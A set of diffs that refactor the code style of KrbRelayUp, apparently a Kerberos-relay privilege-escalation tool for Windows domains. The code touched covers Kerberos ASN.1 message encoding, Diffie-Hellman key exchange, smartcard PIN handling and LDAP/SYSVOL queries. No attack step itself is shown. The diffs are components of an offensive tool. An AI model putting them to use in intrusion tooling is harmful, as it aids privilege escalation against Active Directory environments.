@@ -359,7 +359,7 @@ namespace KrbRelayUp
                 DirectorySearcher searcher = null;
                 try
                 {
-                    directoryObject = Networking.GetLdapSearchRoot(cred, OUName, domainController, domain);
+                    directoryObject = GetLdapSearchRoot(cred, OUName, domainController, domain);
                     searcher = new DirectorySearcher(directoryObject);
                     // enable LDAP paged search to get all results, by pages of 1000 items
                     searcher.PageSize = 1000;
@@ -447,7 +447,7 @@ namespace KrbRelayUp
         public static Dictionary<string, Dictionary<string, Object>> GetGptTmplContent(string path, string user = null, string password = null)
         {
             Dictionary<string, Dictionary<string, Object>> IniObject = new Dictionary<string, Dictionary<string, Object>>();
-            string sysvolPath = String.Format("\\\\{0}\\SYSVOL", (new System.Uri(path).Host));
+            string sysvolPath = String.Format("\\\\{0}\\SYSVOL", (new Uri(path).Host));
 
             int result = AddRemoteConnection(null, sysvolPath, user, password);
             if (result != (int)Interop.SystemErrorCodes.ERROR_SUCCESS)
@@ -455,7 +455,7 @@ namespace KrbRelayUp
                 return null;
             }
 
-            if (System.IO.File.Exists(path))
+            if (File.Exists(path))
             {
                 var content = File.ReadAllLines(path);
                 var CommentCount = 0;

--- a/KrbRelayUp/Kerb/crypto/SafeNativeMethods.cs
+++ b/KrbRelayUp/Kerb/crypto/SafeNativeMethods.cs
@@ -23,17 +23,17 @@ internal static class SafeNativeMethods
             var pinBuffer = Encoding.ASCII.GetBytes(pin);
 
             // provider handle is implicitly released when the certificate handle is released.
-            SafeNativeMethods.Execute(() => SafeNativeMethods.CryptAcquireContext(ref providerHandle,
+            Execute(() => CryptAcquireContext(ref providerHandle,
                                             rsaCsp.CspKeyContainerInfo.KeyContainerName,
                                             rsaCsp.CspKeyContainerInfo.ProviderName,
                                             rsaCsp.CspKeyContainerInfo.ProviderType,
-                                            SafeNativeMethods.CryptContextFlags.Silent));
-            SafeNativeMethods.Execute(() => SafeNativeMethods.CryptSetProvParam(providerHandle,
-                                            SafeNativeMethods.CryptParameter.KeyExchangePin,
+                                            CryptContextFlags.Silent));
+            Execute(() => CryptSetProvParam(providerHandle,
+                                            CryptParameter.KeyExchangePin,
                                             pinBuffer, 0));
-            SafeNativeMethods.Execute(() => SafeNativeMethods.CertSetCertificateContextProperty(
+            Execute(() => CertSetCertificateContextProperty(
                                             certificate.Handle,
-                                            SafeNativeMethods.CertificateProperty.CryptoProviderHandle,
+                                            CertificateProperty.CryptoProviderHandle,
                                             0, providerHandle));
         }
         /* Only available in .NET 4.6+

--- a/KrbRelayUp/Kerb/crypto/dh/DiffieHellmanKey.cs
+++ b/KrbRelayUp/Kerb/crypto/dh/DiffieHellmanKey.cs
@@ -37,7 +37,7 @@ namespace Kerberos.NET.Crypto
 
         public byte[] EncodePublicKey()
         {
-            return AsnElt.MakeInteger(this.PublicComponent).Encode();
+            return AsnElt.MakeInteger(PublicComponent).Encode();
         }
 
         public static DiffieHellmanKey ParsePublicKey(byte[] data, int keyLength)

--- a/KrbRelayUp/Kerb/crypto/dh/ManagedDiffieHellman.cs
+++ b/KrbRelayUp/Kerb/crypto/dh/ManagedDiffieHellman.cs
@@ -55,34 +55,34 @@ namespace Kerberos.NET.Crypto
 
         public ManagedDiffieHellman(byte[] prime, byte[] generator, byte[] factor)
         {
-            this.keyLength = prime.Length;
+            keyLength = prime.Length;
 
             this.prime = ParseBigInteger(prime);
             this.generator = ParseBigInteger(generator);
             this.factor = ParseBigInteger(factor);
 
-            this.x = this.GeneratePrime();
+            x = GeneratePrime();
 
-            this.y = this.generator.ModPow(this.x, this.prime);
+            y = this.generator.ModPow(x, this.prime);
 
-            this.PublicKey = new DiffieHellmanKey
+            PublicKey = new DiffieHellmanKey
             {
                 Type = AsymmetricKeyType.Public,
-                Generator = this.Depad(this.generator.GetBytes()),
-                Modulus = this.Depad(this.prime.GetBytes()),
-                PublicComponent = this.Depad(this.y.GetBytes()),
-                Factor = this.Depad(this.factor.GetBytes()),
+                Generator = Depad(this.generator.GetBytes()),
+                Modulus = Depad(this.prime.GetBytes()),
+                PublicComponent = Depad(y.GetBytes()),
+                Factor = Depad(this.factor.GetBytes()),
                 KeyLength = prime.Length
             };
 
-            this.PrivateKey = new DiffieHellmanKey
+            PrivateKey = new DiffieHellmanKey
             {
                 Type = AsymmetricKeyType.Private,
-                Generator = this.Depad(this.generator.GetBytes()),
-                Modulus = this.Depad(this.prime.GetBytes()),
-                PublicComponent = this.Depad(this.y.GetBytes()),
-                Factor = this.Depad(this.factor.GetBytes()),
-                PrivateComponent = this.Depad(this.x.GetBytes()),
+                Generator = Depad(this.generator.GetBytes()),
+                Modulus = Depad(this.prime.GetBytes()),
+                PublicComponent = Depad(y.GetBytes()),
+                Factor = Depad(this.factor.GetBytes()),
+                PrivateComponent = Depad(x.GetBytes()),
                 KeyLength = prime.Length
             };
         }
@@ -96,7 +96,7 @@ namespace Kerberos.NET.Crypto
             // P in RSA is a safer prime than primes used in DH so it's
             // good enough here, though it's costlier to generate.
 
-            using (var alg = new RSACryptoServiceProvider(this.keyLength * 2 * 8))
+            using (var alg = new RSACryptoServiceProvider(keyLength * 2 * 8))
             {
                 var rsa = alg.ExportParameters(true);
 
@@ -126,13 +126,13 @@ namespace Kerberos.NET.Crypto
 
         public byte[] GenerateAgreement()
         {
-            var z = this.partnerKey.ModPow(this.x, this.prime);
+            var z = partnerKey.ModPow(x, prime);
 
             var ag = z.GetBytes().ToArray();
 
-            var agreement = this.Depad(ag);
+            var agreement = Depad(ag);
 
-            agreement = Pad(agreement, this.keyLength);
+            agreement = Pad(agreement, keyLength);
 
             return agreement;
         }
@@ -144,7 +144,7 @@ namespace Kerberos.NET.Crypto
                 throw new ArgumentNullException(nameof(publicKey));
             }
 
-            this.partnerKey = ParseBigInteger(publicKey.PublicComponent);
+            partnerKey = ParseBigInteger(publicKey.PublicComponent);
         }
 
         private byte[] Depad(byte[] data)
@@ -153,7 +153,7 @@ namespace Kerberos.NET.Crypto
 
             for (leadingZeros = 0; leadingZeros < data.Length; ++leadingZeros)
             {
-                if (!(data[leadingZeros] == 0 && data.Length > this.keyLength))
+                if (!(data[leadingZeros] == 0 && data.Length > keyLength))
                 {
                     break;
                 }
@@ -177,15 +177,15 @@ namespace Kerberos.NET.Crypto
 
         protected virtual void Dispose(bool disposing)
         {
-            if (!this.disposedValue)
+            if (!disposedValue)
             {
-                this.disposedValue = true;
+                disposedValue = true;
             }
         }
 
         public void Dispose()
         {
-            this.Dispose(disposing: true);
+            Dispose(disposing: true);
             GC.SuppressFinalize(this);
         }
     }

--- a/KrbRelayUp/Kerb/crypto/dh/Oakley.cs
+++ b/KrbRelayUp/Kerb/crypto/dh/Oakley.cs
@@ -3,8 +3,6 @@
 // The .NET Foundation licenses this file to you under the MIT license.
 // -----------------------------------------------------------------------
 
-using System;
-
 namespace Kerberos.NET.Crypto
 {
     public static class Oakley

--- a/KrbRelayUp/Kerb/krb_structures/ADIfRelevant.cs
+++ b/KrbRelayUp/Kerb/krb_structures/ADIfRelevant.cs
@@ -1,4 +1,5 @@
-﻿using System.Collections.Generic;
+﻿using System;
+using System.Collections.Generic;
 using Asn1;
 
 namespace KrbRelayUp
@@ -103,7 +104,7 @@ namespace KrbRelayUp
             }
             else if (ad_data.Length < 1)
             {
-                ad_data = new byte[0];
+                ad_data = Array.Empty<byte>();
             }
 
             return ADEncode();

--- a/KrbRelayUp/Kerb/krb_structures/ADIfRelevant.cs
+++ b/KrbRelayUp/Kerb/krb_structures/ADIfRelevant.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
+﻿using System.Collections.Generic;
 using Asn1;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/ADRestrictionEntry.cs
+++ b/KrbRelayUp/Kerb/krb_structures/ADRestrictionEntry.cs
@@ -105,12 +105,12 @@ namespace KrbRelayUp
             // KERB-AD-RESTRICTION-ENTRY encoding
             // restriction-type       [0] Int32
             AsnElt adRestrictionEntryElt = AsnElt.MakeInteger(restriction_type);
-            AsnElt adRestrictionEntrySeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { adRestrictionEntryElt });
+            AsnElt adRestrictionEntrySeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adRestrictionEntryElt });
             adRestrictionEntrySeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, adRestrictionEntrySeq);
 
             // restriction            [1] OCTET STRING
             AsnElt adRestrictionEntryDataElt = AsnElt.MakeBlob(restriction);
-            AsnElt adRestrictionEntryDataSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { adRestrictionEntryDataElt });
+            AsnElt adRestrictionEntryDataSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adRestrictionEntryDataElt });
             adRestrictionEntryDataSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, adRestrictionEntryDataSeq);
 
             AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adRestrictionEntrySeq, adRestrictionEntryDataSeq });

--- a/KrbRelayUp/Kerb/krb_structures/ADWin2KPac.cs
+++ b/KrbRelayUp/Kerb/krb_structures/ADWin2KPac.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using Asn1;
+﻿using Asn1;
 using KrbRelayUp.Kerberos;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/AP_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AP_REQ.cs
@@ -1,7 +1,5 @@
 ﻿using Asn1;
 using System;
-using System.Collections.Generic;
-using System.IO;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/AS_REP.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AS_REP.cs
@@ -26,12 +26,12 @@ namespace KrbRelayUp
             //  false == ignore trailing garbage
             AsnElt asn_AS_REP = AsnElt.Decode(data, false);
 
-            this.Decode(asn_AS_REP);
+            Decode(asn_AS_REP);
         }
 
         public AS_REP(AsnElt asn_AS_REP)
         {
-            this.Decode(asn_AS_REP);
+            Decode(asn_AS_REP);
         }
 
         private void Decode(AsnElt asn_AS_REP)

--- a/KrbRelayUp/Kerb/krb_structures/AS_REP.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AS_REP.cs
@@ -1,5 +1,4 @@
 ﻿using Asn1;
-using System;
 using System.Collections.Generic;
 using System.Text;
 

--- a/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
@@ -243,7 +243,7 @@ namespace KrbRelayUp
                         req_body = new KDCReqBody(s.Sub[0]);
                         break;
                     default:
-                        throw new Exception(String.Format("Invalid tag AS-REQ value : {0}", s.TagValue));
+                        throw new Exception($"Invalid tag AS-REQ value : {s.TagValue}");
                 }
             }
         }

--- a/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
@@ -210,12 +210,12 @@ namespace KrbRelayUp
             //  SEQUENCE
             if (asn_AS_REQ.TagValue != (int)Interop.KERB_MESSAGE_TYPE.AS_REQ)
             {
-                throw new System.Exception("AS-REQ tag value should be 10");
+                throw new Exception("AS-REQ tag value should be 10");
             }
 
             if ((asn_AS_REQ.Sub.Length != 1) || (asn_AS_REQ.Sub[0].TagValue != 16))
             {
-                throw new System.Exception("First AS-REQ sub should be a sequence");
+                throw new Exception("First AS-REQ sub should be a sequence");
             }
 
             // extract the KDC-REP out
@@ -243,7 +243,7 @@ namespace KrbRelayUp
                         req_body = new KDCReqBody(s.Sub[0]);
                         break;
                     default:
-                        throw new System.Exception(String.Format("Invalid tag AS-REQ value : {0}", s.TagValue));
+                        throw new Exception(String.Format("Invalid tag AS-REQ value : {0}", s.TagValue));
                 }
             }
         }

--- a/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AS_REQ.cs
@@ -1,7 +1,6 @@
 ﻿using Asn1;
 using System;
 using System.Collections.Generic;
-using System.IO;
 using System.Net;
 using System.Security.Cryptography.X509Certificates;
 

--- a/KrbRelayUp/Kerb/krb_structures/Authenticator.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Authenticator.cs
@@ -1,6 +1,5 @@
 ﻿using System;
 using Asn1;
-using System.Text;
 using System.Collections.Generic;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/Authenticator.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Authenticator.cs
@@ -114,7 +114,7 @@ namespace KrbRelayUp
 
 
             // tag the final total
-            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { seq });
+            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new[] { seq });
             final = AsnElt.MakeImplicit(AsnElt.APPLICATION, 2, final);
 
             return final;

--- a/KrbRelayUp/Kerb/krb_structures/AuthorizationData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AuthorizationData.cs
@@ -1,7 +1,4 @@
 ﻿using Asn1;
-using System;
-using System.Collections.Generic;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/AuthorizationData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/AuthorizationData.cs
@@ -26,12 +26,12 @@ namespace KrbRelayUp
         {
             // ad-type            [0] Int32
             AsnElt adTypeElt = AsnElt.MakeInteger((long)ad_type);
-            AsnElt adTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { adTypeElt });
+            AsnElt adTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adTypeElt });
             adTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, adTypeSeq);
 
             // ad-data            [1] OCTET STRING
             AsnElt adDataElt = AsnElt.MakeBlob(ad_data);
-            AsnElt adDataSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { adDataElt });
+            AsnElt adDataSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adDataElt });
             adDataSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, adDataSeq);
 
             AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { adTypeSeq, adDataSeq });

--- a/KrbRelayUp/Kerb/krb_structures/Checksum.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Checksum.cs
@@ -1,7 +1,5 @@
 ﻿using System;
 using Asn1;
-using System.Text;
-using System.Collections.Generic;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/Checksum.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Checksum.cs
@@ -47,18 +47,18 @@ namespace KrbRelayUp
         {
             // cksumtype       [0] Int32
             AsnElt cksumtypeAsn = AsnElt.MakeInteger(cksumtype);
-            AsnElt cksumtypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { cksumtypeAsn });
+            AsnElt cksumtypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { cksumtypeAsn });
             cksumtypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, cksumtypeSeq);
 
 
             // checksum        [1] OCTET STRING
             AsnElt checksumAsn = AsnElt.MakeBlob(checksum);
-            AsnElt checksumSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { checksumAsn });
+            AsnElt checksumSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { checksumAsn });
             checksumSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, checksumSeq);
 
 
-            AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { cksumtypeSeq, checksumSeq });
-            AsnElt totalSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { totalSeq });
+            AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { cksumtypeSeq, checksumSeq });
+            AsnElt totalSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { totalSeq });
             return totalSeq2;
         }
 

--- a/KrbRelayUp/Kerb/krb_structures/ETYPE_INFO2_ENTRY.cs
+++ b/KrbRelayUp/Kerb/krb_structures/ETYPE_INFO2_ENTRY.cs
@@ -1,6 +1,4 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Text;
 using Asn1;
 

--- a/KrbRelayUp/Kerb/krb_structures/EncKDCRepPart.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncKDCRepPart.cs
@@ -1,7 +1,6 @@
 ﻿using System;
 using Asn1;
 using System.Text;
-using System.Collections.Generic;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/EncKrbCredPart.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncKrbCredPart.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using Asn1;
+﻿using Asn1;
 using System.Collections.Generic;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/EncKrbPrivPart.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncKrbPrivPart.cs
@@ -1,8 +1,6 @@
 ﻿using System;
 using Asn1;
-using System.Collections.Generic;
 using System.Text;
-using System.IO;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/EncKrbPrivPart.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncKrbPrivPart.cs
@@ -47,7 +47,7 @@ namespace KrbRelayUp
 
             AsnElt new_passwordSeq;
             if (username == null)
-                new_passwordSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
+                new_passwordSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] {
                      AsnElt.MakeExplicit(AsnElt.CONTEXT, 0, new_passwordAsn),
                 });
             else
@@ -55,7 +55,7 @@ namespace KrbRelayUp
 
                 PrincipalName principal = new PrincipalName(username);
 
-                new_passwordSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
+                new_passwordSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] {
                     AsnElt.MakeExplicit(AsnElt.CONTEXT, 0, new_passwordAsn),
                     AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, principal.Encode()),
                     AsnElt.MakeExplicit(AsnElt.CONTEXT, 2, AsnElt.MakeString(AsnElt.GeneralString, realm)),
@@ -66,21 +66,21 @@ namespace KrbRelayUp
 
             // seq-number      [3] UInt32 OPTIONAL
             AsnElt seq_numberAsn = AsnElt.MakeInteger(seq_number);
-            AsnElt seq_numberSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { seq_numberAsn });
+            AsnElt seq_numberSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { seq_numberAsn });
             seq_numberSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 3, seq_numberSeq);
 
             //  s-address       [4] HostAddress
             AsnElt hostAddressTypeAsn = AsnElt.MakeInteger(20);
-            AsnElt hostAddressTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { hostAddressTypeAsn });
+            AsnElt hostAddressTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { hostAddressTypeAsn });
             hostAddressTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, hostAddressTypeSeq);
 
             byte[] hostAddressAddressBytes = Encoding.ASCII.GetBytes(host_name);
             AsnElt hostAddressAddressAsn = AsnElt.MakeBlob(hostAddressAddressBytes);
-            AsnElt hostAddressAddressSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { hostAddressAddressAsn });
+            AsnElt hostAddressAddressSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { hostAddressAddressAsn });
             hostAddressAddressSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, hostAddressAddressSeq);
 
             AsnElt hostAddressSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { hostAddressTypeSeq, hostAddressAddressSeq });
-            AsnElt hostAddressSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { hostAddressSeq });
+            AsnElt hostAddressSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { hostAddressSeq });
             hostAddressSeq2 = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, hostAddressSeq2);
 
             AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { new_passwordSeq, seq_numberSeq, hostAddressSeq2 });

--- a/KrbRelayUp/Kerb/krb_structures/EncryptedData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncryptedData.cs
@@ -1,7 +1,5 @@
 ﻿using System;
 using Asn1;
-using System.Text;
-using System.Collections.Generic;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/EncryptedData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncryptedData.cs
@@ -54,13 +54,13 @@ namespace KrbRelayUp
         {
             // etype   [0] Int32 -- EncryptionType --,
             AsnElt etypeAsn = AsnElt.MakeInteger(etype);
-            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeAsn });
+            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeAsn });
             etypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, etypeSeq);
 
 
             // cipher  [2] OCTET STRING -- ciphertext
             AsnElt cipherAsn = AsnElt.MakeBlob(cipher);
-            AsnElt cipherSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { cipherAsn });
+            AsnElt cipherSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { cipherAsn });
             cipherSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, cipherSeq);
 
 
@@ -68,15 +68,15 @@ namespace KrbRelayUp
             {
                 // kvno    [1] UInt32 OPTIONAL
                 AsnElt kvnoAsn = AsnElt.MakeInteger(kvno);
-                AsnElt kvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { kvnoAsn });
+                AsnElt kvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { kvnoAsn });
                 kvnoSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, kvnoSeq);
 
-                AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeSeq, kvnoSeq, cipherSeq });
+                AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeSeq, kvnoSeq, cipherSeq });
                 return totalSeq;
             }
             else
             {
-                AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeSeq, cipherSeq });
+                AsnElt totalSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeSeq, cipherSeq });
                 return totalSeq;
             }
         }

--- a/KrbRelayUp/Kerb/krb_structures/EncryptionKey.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncryptionKey.cs
@@ -1,7 +1,5 @@
 ﻿using System;
 using Asn1;
-using System.Text;
-using System.Collections.Generic;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/EncryptionKey.cs
+++ b/KrbRelayUp/Kerb/krb_structures/EncryptionKey.cs
@@ -42,7 +42,7 @@ namespace KrbRelayUp
         {
             // keytype[0] Int32 -- actually encryption type --
             AsnElt keyTypeElt = AsnElt.MakeInteger(keytype);
-            AsnElt keyTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { keyTypeElt });
+            AsnElt keyTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { keyTypeElt });
             keyTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, keyTypeSeq);
 
 

--- a/KrbRelayUp/Kerb/krb_structures/HostAddress.cs
+++ b/KrbRelayUp/Kerb/krb_structures/HostAddress.cs
@@ -68,12 +68,12 @@ namespace KrbRelayUp
             // addr-type[0] Int32
             // addr-string[1] OCTET STRING
             AsnElt addrTypeElt = AsnElt.MakeInteger((long)addr_type);
-            AsnElt addrTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { addrTypeElt });
+            AsnElt addrTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { addrTypeElt });
             addrTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, addrTypeSeq);
 
             AsnElt addrStringElt = AsnElt.MakeString(AsnElt.TeletexString, addr_string);
             addrStringElt = AsnElt.MakeImplicit(AsnElt.UNIVERSAL, AsnElt.OCTET_STRING, addrStringElt);
-            AsnElt addrStringSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { addrStringElt });
+            AsnElt addrStringSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { addrStringElt });
             addrStringSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, addrStringSeq);
 
             AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { addrTypeSeq, addrStringSeq });

--- a/KrbRelayUp/Kerb/krb_structures/HostAddress.cs
+++ b/KrbRelayUp/Kerb/krb_structures/HostAddress.cs
@@ -1,6 +1,5 @@
 ﻿using Asn1;
 using System;
-using System.Collections.Generic;
 using System.Text;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/KDC_PROXY_MESSAGE.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KDC_PROXY_MESSAGE.cs
@@ -61,7 +61,7 @@ namespace KrbRelayUp
 
             // kerb-message [0] OCTET STRING
             AsnElt messageAsn = AsnElt.MakeBlob(kerb_message);
-            AsnElt messageSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { messageAsn });
+            AsnElt messageSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { messageAsn });
             messageSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, messageSeq);
             allNodes.Add(messageSeq);
 

--- a/KrbRelayUp/Kerb/krb_structures/KDC_REQ_BODY.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KDC_REQ_BODY.cs
@@ -234,8 +234,8 @@ namespace KrbRelayUp
             if (additional_tickets.Count > 0)
             {
                 AsnElt ticketAsn = additional_tickets[0].Encode();
-                AsnElt ticketSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { ticketAsn });
-                AsnElt ticketSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { ticketSeq });
+                AsnElt ticketSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { ticketAsn });
+                AsnElt ticketSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { ticketSeq });
                 ticketSeq2 = AsnElt.MakeImplicit(AsnElt.CONTEXT, 11, ticketSeq2);
                 allNodes.Add(ticketSeq2);
             }

--- a/KrbRelayUp/Kerb/krb_structures/KERB_PA_PAC_REQUEST.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KERB_PA_PAC_REQUEST.cs
@@ -33,7 +33,7 @@ namespace KrbRelayUp
                 ret = AsnElt.MakeBlob(new byte[] { 0x30, 0x05, 0xa0, 0x03, 0x01, 0x01, 0x00 });
             }
 
-            AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { ret });
+            AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { ret });
 
             return seq;
         }

--- a/KrbRelayUp/Kerb/krb_structures/KERB_PA_PAC_REQUEST.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KERB_PA_PAC_REQUEST.cs
@@ -1,6 +1,4 @@
 ﻿using Asn1;
-using System;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/KRB_CRED.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KRB_CRED.cs
@@ -28,12 +28,12 @@ namespace KrbRelayUp
         {
             RawBytes = bytes;
             AsnElt asn_KRB_CRED = AsnElt.Decode(bytes, false);
-            this.Decode(asn_KRB_CRED.Sub[0]);
+            Decode(asn_KRB_CRED.Sub[0]);
         }
 
         public KRB_CRED(AsnElt body)
         {
-            this.Decode(body);
+            Decode(body);
         }
 
         public void Decode(AsnElt body)
@@ -70,21 +70,21 @@ namespace KrbRelayUp
         {
             // pvno            [0] INTEGER (5)
             AsnElt pvnoAsn = AsnElt.MakeInteger(pvno);
-            AsnElt pvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { pvnoAsn });
+            AsnElt pvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { pvnoAsn });
             pvnoSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, pvnoSeq);
 
 
             // msg-type        [1] INTEGER (22)
             AsnElt msg_typeAsn = AsnElt.MakeInteger(msg_type);
-            AsnElt msg_typeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { msg_typeAsn });
+            AsnElt msg_typeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { msg_typeAsn });
             msg_typeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, msg_typeSeq);
 
 
             // tickets         [2] SEQUENCE OF Ticket
             //  TODO: encode/handle multiple tickets!
             AsnElt ticketAsn = tickets[0].Encode();
-            AsnElt ticketSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { ticketAsn });
-            AsnElt ticketSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { ticketSeq });
+            AsnElt ticketSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { ticketAsn });
+            AsnElt ticketSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { ticketSeq });
             ticketSeq2 = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, ticketSeq2);
 
 
@@ -92,24 +92,24 @@ namespace KrbRelayUp
             AsnElt enc_partAsn = enc_part.Encode();
             AsnElt blob = AsnElt.MakeBlob(enc_partAsn.Encode());
 
